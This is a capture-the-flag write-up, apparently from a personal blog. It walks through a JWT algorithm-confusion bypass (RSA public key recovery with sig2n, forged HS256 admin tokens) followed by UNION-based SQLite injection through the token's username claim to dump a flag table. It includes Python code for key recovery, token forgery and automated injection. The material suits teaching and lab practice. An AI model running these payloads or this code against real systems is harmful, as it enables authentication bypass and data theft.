0xc0rvu5.github.io


JWT

SQLi

Refer to the following for additional information:

JWT Attacks

JWT authentication bypass via algorithm confusion with no exposed key

Go to:

http://104.248.172.48:32311/

Register a user with any arbitrary username/password, for example:

hey:hey

Ensure Burp Suite is active and proxying the browser
Go to: Extender -> BApp Store -> Search (JWT Editor) -> Install (the tab is named Extensions in newer Burp releases)
Login as:

hey:hey

Go to: HTTP history
Copy the JWT cookie
Logout
Login again as:

hey:hey

Go to: HTTP history
Copy the second JWT cookie (sig2n needs two tokens signed by the same RSA key; the second login produces a different payload and signature, which is what the gcd step below relies on)

Use PortSwigger's sig2n Docker image, which recovers the RSA public key (the modulus n) from two RS256 signatures and emits HS256-signed copies of the token keyed with that public key:
Syntax:

docker run --rm -it portswigger/sig2n cookie1 cookie2

Cookie 1

eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.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.VPHUdzHzxRFewKuYtVb4k3_y7tmH5qzAyyZyZjgw4Fu2hJgF-VSQevcMFDeXMsKozr0jbQjhHPtTwxuyToGqWbIbgcShL241c1JKOWBViBqaKtd0wD9rw_MuUufBK1LXQz-LyRoHrspFrdxQIZf2vzH0_ZE45fMPhEtpYGyHSbKdk6jVfWoOFmgMn5mj195nXTDYebCdjo-KXEJpiY-KT4RxNweR8OHVmVZAuVP3U0tWuOquhITyKD_6r8V-PXkCwLTTazOyfTbafAOMTq_DxdDsA51EKW5_ZzLiW_0u9nM_o-5oQu7dHVxOl8JSwxikf701GIOlwojkx2OV2QeVIg

Cookie 2

eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.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.XTuCoLLfHPn9oD-hUaX5RtVuMNgEXmns_TBgjfGM7K6nYJIsjB5pcwxdrxzOYXGn0273HZVAGNkxHxy0V9ZmKAYagub_vX2BMS_pa4Ozcvpc8RiR_PpooDDGzHyoect8Ly3eDAaVu0yTFjK6_UAWvaRvsqbuK8IKWp4diif5bUAbEq0NdMfSS6_g8AumIbT3bL3Q1TWVxau4Fv-_kAPumILK1tDHeghz2EcKKekoqZiYSsvkGDx6Uvjkdjg7ElORjt3byrm0xL383V92ClGS05j8JcU2JM9jZDvqjDD14oZILFcxbkyqv0EBb275pbakpB8QyWxp1g5b_FOVS1IOnw

Like so:

docker run --rm -it portswigger/sig2n eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImhleSIsInBrIjoiLS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS1cbk1JSUJJakFOQmdrcWhraUc5dzBCQVFFRkFBT0NBUThBTUlJQkNnS0NBUUVBOTVvVG05RE56Y0hyOGdMaGpaYVlcbmt0c2JqMUt4eFVPb3p3MHRyUDkzQmdJcFh2NldpcFFSQjVscW9mUGxVNkZCOTlKYzVRWjA0NTl0NzNnZ1ZEUWlcblh1Q01JMmhvVWZKMVZtak5lV0NyU3JEVWhva0lGWkV1Q3VtZWh3d3RVTnVFdjBlekM1NFpUZEVDNVlTVEFPemdcbmpJV2Fsc0hqL2dhNVpFRHgzRXh0ME1oNUFFd2JBRDczK3FYUy91Q3ZoZmFqZ3B6SEdkOU9nTlFVNjBMTWYybUhcbitGeW5Oc2pOTndvNW5SZTd0UjEyV2IyWU9DeHcydmRhbU8xbjFrZi9TTXlwU0tLdk9najV5MExHaVUzamVYTXhcblY4V1MrWWlZQ1U1T0JBbVRjejJ3Mmt6QmhaRmxINlJLNG1xdWV4SkhyYTIzSUd2NVVKNUdWUEVYcGRDcUszVHJcbjB3SURBUUFCXG4tLS0tLUVORCBQVUJMSUMgS0VZLS0tLS1cbiIsImlhdCI6MTY1NjEyMDQ0M30.VPHUdzHzxRFewKuYtVb4k3_y7tmH5qzAyyZyZjgw4Fu2hJgF-VSQevcMFDeXMsKozr0jbQjhHPtTwxuyToGqWbIbgcShL241c1JKOWBViBqaKtd0wD9rw_MuUufBK1LXQz-LyRoHrspFrdxQIZf2vzH0_ZE45fMPhEtpYGyHSbKdk6jVfWoOFmgMn5mj195nXTDYebCdjo-KXEJpiY-KT4RxNweR8OHVmVZAuVP3U0tWuOquhITyKD_6r8V-PXkCwLTTazOyfTbafAOMTq_DxdDsA51EKW5_ZzLiW_0u9nM_o-5oQu7dHVxOl8JSwxikf701GIOlwojkx2OV2QeVIg eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.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.XTuCoLLfHPn9oD-hUaX5RtVuMNgEXmns_TBgjfGM7K6nYJIsjB5pcwxdrxzOYXGn0273HZVAGNkxHxy0V9ZmKAYagub_vX2BMS_pa4Ozcvpc8RiR_PpooDDGzHyoect8Ly3eDAaVu0yTFjK6_UAWvaRvsqbuK8IKWp4diif5bUAbEq0NdMfSS6_g8AumIbT3bL3Q1TWVxau4Fv-_kAPumILK1tDHeghz2EcKKekoqZiYSsvkGDx6Uvjkdjg7ElORjt3byrm0xL383V92ClGS05j8JcU2JM9jZDvqjDD14oZILFcxbkyqv0EBb275pbakpB8QyWxp1g5b_FOVS1IOnw

Response (the key is printed in two PEM encodings, X.509/SubjectPublicKeyInfo and PKCS#1, each with a tampered HS256 token that uses the PEM text as the HMAC secret; try both, since only the encoding whose bytes match the server's key file byte for byte will verify):

Found n with multiplier 1:
    Base64 encoded x509 key: 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
    Tampered JWT: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.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.233s7n_rYQWWHIRLzlw56_yxlofoaXE7-aM31TIP1TE
    Base64 encoded pkcs1 key: LS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JSUJDZ0tDQVFFQTk1b1RtOUROemNIcjhnTGhqWmFZa3RzYmoxS3h4VU9vencwdHJQOTNCZ0lwWHY2V2lwUVIKQjVscW9mUGxVNkZCOTlKYzVRWjA0NTl0NzNnZ1ZEUWlYdUNNSTJob1VmSjFWbWpOZVdDclNyRFVob2tJRlpFdQpDdW1laHd3dFVOdUV2MGV6QzU0WlRkRUM1WVNUQU96Z2pJV2Fsc0hqL2dhNVpFRHgzRXh0ME1oNUFFd2JBRDczCitxWFMvdUN2aGZhamdwekhHZDlPZ05RVTYwTE1mMm1IK0Z5bk5zak5Od281blJlN3RSMTJXYjJZT0N4dzJ2ZGEKbU8xbjFrZi9TTXlwU0tLdk9najV5MExHaVUzamVYTXhWOFdTK1lpWUNVNU9CQW1UY3oydzJrekJoWkZsSDZSSwo0bXF1ZXhKSHJhMjNJR3Y1VUo1R1ZQRVhwZENxSzNUcjB3SURBUUFCCi0tLS0tRU5EIFJTQSBQVUJMSUMgS0VZLS0tLS0K
    Tampered JWT: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.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.1JATbSWXpBUGZ6QYAP5uuNfGsYUTS7PU9YuXU7zce7U

Go to: Repeater -> Request -> Raw
Change:

Cookie: session=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.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.VPHUdzHzxRFewKuYtVb4k3_y7tmH5qzAyyZyZjgw4Fu2hJgF-VSQevcMFDeXMsKozr0jbQjhHPtTwxuyToGqWbIbgcShL241c1JKOWBViBqaKtd0wD9rw_MuUufBK1LXQz-LyRoHrspFrdxQIZf2vzH0_ZE45fMPhEtpYGyHSbKdk6jVfWoOFmgMn5mj195nXTDYebCdjo-KXEJpiY-KT4RxNweR8OHVmVZAuVP3U0tWuOquhITyKD_6r8V-PXkCwLTTazOyfTbafAOMTq_DxdDsA51EKW5_ZzLiW_0u9nM_o-5oQu7dHVxOl8JSwxikf701GIOlwojkx2OV2QeVIg

To

Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICJoZXkiLCAicGsiOiAiLS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS1cbk1JSUJJakFOQmdrcWhraUc5dzBCQVFFRkFBT0NBUThBTUlJQkNnS0NBUUVBOTVvVG05RE56Y0hyOGdMaGpaYVlcbmt0c2JqMUt4eFVPb3p3MHRyUDkzQmdJcFh2NldpcFFSQjVscW9mUGxVNkZCOTlKYzVRWjA0NTl0NzNnZ1ZEUWlcblh1Q01JMmhvVWZKMVZtak5lV0NyU3JEVWhva0lGWkV1Q3VtZWh3d3RVTnVFdjBlekM1NFpUZEVDNVlTVEFPemdcbmpJV2Fsc0hqL2dhNVpFRHgzRXh0ME1oNUFFd2JBRDczK3FYUy91Q3ZoZmFqZ3B6SEdkOU9nTlFVNjBMTWYybUhcbitGeW5Oc2pOTndvNW5SZTd0UjEyV2IyWU9DeHcydmRhbU8xbjFrZi9TTXlwU0tLdk9najV5MExHaVUzamVYTXhcblY4V1MrWWlZQ1U1T0JBbVRjejJ3Mmt6QmhaRmxINlJLNG1xdWV4SkhyYTIzSUd2NVVKNUdWUEVYcGRDcUszVHJcbjB3SURBUUFCXG4tLS0tLUVORCBQVUJMSUMgS0VZLS0tLS1cbiIsICJpYXQiOiAxNjU2MTIwNDQzLCAiZXhwIjogMTY1NjIwNzM4N30.233s7n_rYQWWHIRLzlw56_yxlofoaXE7-aM31TIP1TE

Response (200 means the server accepted an HS256 signature computed with its own public key as the secret, confirming the algorithm confusion):

HTTP/1.1 200 OK

Go to: Repeater -> JSON Web Token -> Payload
Change:

{"username": "hey",

To

{"username": "administrator",

Which changes the cookie to:

Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.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.-YBnt3sP1iCGcA1pxTGso9fdRIVZW8lgBYUfpzt56ho

Send
Response:

HTTP/1.1 200 OK

user administrator doesnt exist in our database.

Copy the corresponding base64 encoded x509 key (this is the same PEM that the token's own payload carries in its pk claim, visible by base64-decoding the middle segment of the cookie; sig2n confirms it from the signatures alone):

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

Go to: JWT Editor Keys -> New Symmetric Key -> Generate, then replace the generated k value (the base64 secret) with the sig2n x509 key, because the PEM text itself is the HMAC secret
Change:

"k": "vQL86pVOfY7Nln7LYXtbAw"

To

"k": "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"

-> OK
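The two halves of the procedure above (recovering n from a pair of RS256 tokens, then forging an HS256 token with the PEM as the secret), as an added example written for this page; it is not the author's code and not sig2n. Assumptions: the target's key is unknown, so make_key() generates a toy 1024-bit key with e=3 to stand in for the server (real keys use e=65537; the maths is identical, only the intermediate integers are far larger, which is why sig2n takes a while), and the claims and PEM layout mirror what the page shows. The idea behind sig2n is that an RS256 signature satisfies s^e = pad(m) (mod n), so n divides s^e - pad(m) for every token; the gcd of that value across two tokens is n times a small multiplier (hence sig2n's "multiplier 1"), and trial division strips the multiplier off.

```python
import base64, hashlib, hmac, json, random
from math import gcd

# DER DigestInfo prefix for SHA-256 (RFC 8017 section 9.2, note 1)
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")

def b64u(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64u_dec(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def emsa_pkcs1_v15(msg: bytes, k: int) -> int:  # EMSA-PKCS1-v1_5 for a k-byte modulus
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return int.from_bytes(b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t, "big")

def signing_input(alg: str, claims: dict) -> str:
    enc = lambda obj: b64u(json.dumps(obj, separators=(",", ":")).encode())
    return enc({"alg": alg, "typ": "JWT"}) + "." + enc(claims)

# Toy RS256 signer standing in for the target (assumption: its key is unknown to us;
# e=3 keeps s**e small enough for pure-Python gcd, the maths is unchanged for 65537).
def is_probable_prime(n: int, rounds: int = 16) -> bool:
    if n < 2 or any(n % p == 0 for p in (2, 3, 5, 7, 11, 13)):
        return n in (2, 3, 5, 7, 11, 13)
    r = ((n - 1) & (1 - n)).bit_length() - 1  # n - 1 = d * 2**r with d odd
    d = (n - 1) >> r
    for _ in range(rounds):  # Miller-Rabin with random bases
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def make_key(bits: int = 1024, e: int = 3):
    def prime(b):  # top two bits set so n is exactly `bits` long; p % e != 1 keeps e invertible
        while True:
            c = random.getrandbits(b) | (3 << (b - 2)) | 1
            if c % e != 1 and is_probable_prime(c):
                return c
    p, q = prime(bits // 2), prime(bits // 2)
    return p * q, e, pow(e, -1, (p - 1) * (q - 1))

def rs256_sign(claims: dict, n: int, d: int) -> str:
    k, si = (n.bit_length() + 7) // 8, signing_input("RS256", claims)
    return si + "." + b64u(pow(emsa_pkcs1_v15(si.encode(), k), d, n).to_bytes(k, "big"))

def recover_n(tok1: str, tok2: str, e: int = 3) -> int:
    """What sig2n does: n divides s**e - pad(m) for every token, so the gcd of two such
    values is n times a small 'multiplier', which trial division then strips off."""
    def term(tok):
        h, p, sig = tok.split(".")
        s = b64u_dec(sig)
        return pow(int.from_bytes(s, "big"), e) - emsa_pkcs1_v15(f"{h}.{p}".encode(), len(s)), len(s)
    (v1, k), (v2, _) = term(tok1), term(tok2)
    g = gcd(v1, v2)
    for f in range(2, 1 << 16):  # assumes a full-length modulus, which real RSA keys have
        while g % f == 0 and g.bit_length() > 8 * k:
            g //= f
    return g

def _der(tag: int, body: bytes) -> bytes:
    n = len(body)
    lenb = bytes([n]) if n < 128 else bytes([0x80 | (n.bit_length() + 7) // 8]) + n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag]) + lenb + body

def _der_int(x: int) -> bytes:  # +8 bits keeps a leading 0x00 when the high bit is set
    return _der(0x02, x.to_bytes((x.bit_length() + 8) // 8, "big"))

def spki_pem(n: int, e: int) -> str:
    """SubjectPublicKeyInfo PEM ('BEGIN PUBLIC KEY'): the x509 form sig2n prints."""
    rsa_pub = _der(0x30, _der_int(n) + _der_int(e))
    alg = _der(0x30, bytes.fromhex("06092a864886f70d010101") + b"\x05\x00")  # rsaEncryption, NULL
    body = base64.b64encode(_der(0x30, alg + _der(0x03, b"\x00" + rsa_pub))).decode()
    return "-----BEGIN PUBLIC KEY-----\n" + "\n".join(body[i:i + 64] for i in range(0, len(body), 64)) + "\n-----END PUBLIC KEY-----\n"

def forge_hs256(claims: dict, secret: bytes) -> str:  # the confusion: HS256 keyed with the PEM text
    si = signing_input("HS256", claims)
    return si + "." + b64u(hmac.new(secret, si.encode(), hashlib.sha256).digest())

def hs256_verify(token: str, secret: bytes):  # what the vulnerable server effectively does
    h, p, s = token.split(".")
    mac = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return json.loads(b64u_dec(p)) if hmac.compare_digest(mac, b64u_dec(s)) else None

def demo(seed: int = 7) -> dict:
    random.seed(seed)
    n, e, d = make_key()
    t1 = rs256_sign({"username": "hey", "iat": 1656120443}, n, d)  # two logins, one key
    t2 = rs256_sign({"username": "hey", "iat": 1656120500}, n, d)
    n_rec = recover_n(t1, t2, e)
    pem = spki_pem(n_rec, e)
    return {"n": n, "recovered_n": n_rec, "pem": pem,
            "forged": forge_hs256({"username": "administrator"}, pem.encode())}
```

demo() returns the original and recovered modulus, the PEM built from the recovered key and a forged administrator token; hs256_verify() plays the vulnerable server, which accepts the token because it keys HS256 with the PEM text. The secret has to be the exact bytes of the server's key file, trailing newline included, which is why sig2n prints both PEM encodings and the writeup tries each.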
Go to: Repeater -> Request -> JSON Web Token -> Payload
Change:

{"username": "administrator",

To

{"username": "' UNION SELECT NULL,NULL-- a",

Go to: Repeater -> Request -> JSON Web Token -> Sign -> Signing key (newly created key) (don't modify header) -> OK
Response (re-sign this way after every payload edit, since changing the claims invalidates the previous HMAC; the verbose error below reveals that the engine is SQLite and that the original SELECT returns a different number of columns, so keep adding NULLs until it goes away):

HTTP/1.1 500 Internal Server Error

Error: SQLITE_ERROR: SELECTs to the left and right of UNION do not have the same number of result columns

Change:

{"username": "' UNION SELECT NULL,NULL-- a",

To

{"username": "' UNION SELECT NULL,NULL,NULL-- a",

Go to: Repeater -> Request -> JSON Web Token -> Sign -> Signing key (newly created key) (don't modify header) -> OK
Send
Response (three columns match the original query, so the UNION is accepted):

HTTP/1.1 200 OK

Change:

{"username": "' UNION SELECT NULL,NULL,NULL-- a",

To

{"username": "' UNION SELECT name,NULL,NULL FROM sqlite_master where type='table' limit 1 offset 0-- a",

Go to: Repeater -> Request -> JSON Web Token -> Sign -> Signing key (newly created key) (don't modify header) -> OK
Send
Response (the greeting echoes only the second column, so the value to read must be placed there):

Welcome <br>

Change:

{"username": "' UNION SELECT name,NULL,NULL FROM sqlite_master where type='table' limit 1 offset 0-- a",

To

{"username": "' UNION SELECT NULL,name,NULL FROM sqlite_master where type='table' limit 1 offset 0-- a",

Go to: Repeater -> Request -> JSON Web Token -> Sign -> Signing key (newly created key) (don't modify header) -> OK
Send
Response:

Welcome flag_storage<br>

Change:

{"username": "' UNION SELECT NULL,name,NULL FROM sqlite_master where type='table' limit 1 offset 0-- a",

To

{"username": "' UNION SELECT NULL,sql,NULL FROM sqlite_master where tbl_name = 'flag_storage' and type='table' limit 1 offset 0-- a",

Go to: Repeater -> Request -> JSON Web Token -> Sign -> Signing key (newly created key) (don't modify header) -> OK
Send
Response:

Welcome CREATE TABLE &quot;flag_storage&quot; (
&quot;id&quot;	INTEGER PRIMARY KEY AUTOINCREMENT,
&quot;top_secret_flaag&quot;	TEXT
)<br>

Change:

{"username": "' UNION SELECT NULL,sql,NULL FROM sqlite_master where tbl_name = 'flag_storage' and type='table' limit 1 offset 0-- a",

To

{"username": "' UNION SELECT NULL,top_secret_flaag,NULL FROM flag_storage limit 1 offset 0-- a",

Go to: Repeater -> Request -> JSON Web Token -> Sign -> Signing key (newly created key) (don't modify header) -> OK
Send
Response:

Welcome HTB{flag}<br>
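The SQL injection sequence above, replayed against a local SQLite database as an added example written for this page (not the challenge's server code). The schema of flag_storage is the one the page recovered; the users table, its three columns, the error text format and the flag value are constructed assumptions chosen to reproduce the responses seen above. welcome_vulnerable() splices the JWT's username claim into the query the way the target evidently did, union_rows() pages through a column one row at a time with LIMIT 1 OFFSET n, and welcome_fixed() shows the parameterised query that makes the same payloads harmless.

```python
import sqlite3

def build_db() -> sqlite3.Connection:
    """Constructed sample database: flag_storage is the CREATE TABLE the page recovered;
    the users table, its three columns and the flag value are assumptions."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO users (username, password_hash) VALUES ('hey', 'hash-of-hey');
        CREATE TABLE "flag_storage" ("id" INTEGER PRIMARY KEY AUTOINCREMENT, "top_secret_flaag" TEXT);
        INSERT INTO flag_storage (top_secret_flaag) VALUES ('HTB{flag}');
    """)
    return db

def welcome_vulnerable(db: sqlite3.Connection, username: str) -> str:
    """Models the target: the JWT's username claim is spliced into the query and the
    second selected column is echoed in the greeting (None renders as empty text)."""
    sql = f"SELECT id, username, password_hash FROM users WHERE username = '{username}'"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:  # verbose errors are what made the column count guessable
        return f"500 Internal Server Error: SQLITE_ERROR: {exc}"
    if row is None:
        return f"user {username} doesnt exist in our database."
    return f"Welcome {'' if row[1] is None else row[1]}<br>"

def welcome_fixed(db: sqlite3.Connection, username: str) -> str:
    """Parameterised query: the claim is bound as data, so the same payloads are inert."""
    sql = "SELECT id, username, password_hash FROM users WHERE username = ?"
    row = db.execute(sql, (username,)).fetchone()
    return f"Welcome {row[1]}<br>" if row else f"user {username} doesnt exist in our database."

def find_column_count(db: sqlite3.Connection, max_cols: int = 10):
    """Add NULLs until SQLite stops complaining about mismatched column counts."""
    for n in range(1, max_cols + 1):
        reply = welcome_vulnerable(db, "' UNION SELECT " + ",".join(["NULL"] * n) + "-- a")
        if "same number of result columns" not in reply:
            return n
    return None

def union_rows(db: sqlite3.Connection, column_expr: str, source: str) -> list:
    """Page one row at a time with LIMIT 1 OFFSET n, as the writeup did, putting the
    value in column 2 because that is the column the greeting echoes."""
    rows, offset = [], 0
    while True:
        payload = f"' UNION SELECT NULL,{column_expr},NULL FROM {source} LIMIT 1 OFFSET {offset}-- a"
        reply = welcome_vulnerable(db, payload)
        if not reply.startswith("Welcome "):
            return rows
        rows.append(reply[len("Welcome "):-len("<br>")])
        offset += 1

def dump_flag(db: sqlite3.Connection) -> dict:
    """The full chain from the page: column count, table names, schema, then the flag."""
    return {
        "columns": find_column_count(db),
        "tables": union_rows(db, "name", "sqlite_master WHERE type='table'"),
        "schema": union_rows(db, "sql", "sqlite_master WHERE tbl_name='flag_storage' AND type='table'")[0],
        "flags": union_rows(db, "top_secret_flaag", "flag_storage"),
    }
```

Note that union_rows() stops at the first non-greeting reply, so on a real target the enumeration ends with one "doesnt exist" response per column, and that a UNION (unlike UNION ALL) returns de-duplicated rows whose order is up to the engine, so collect every offset rather than assuming the first row is the interesting one.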


#hacking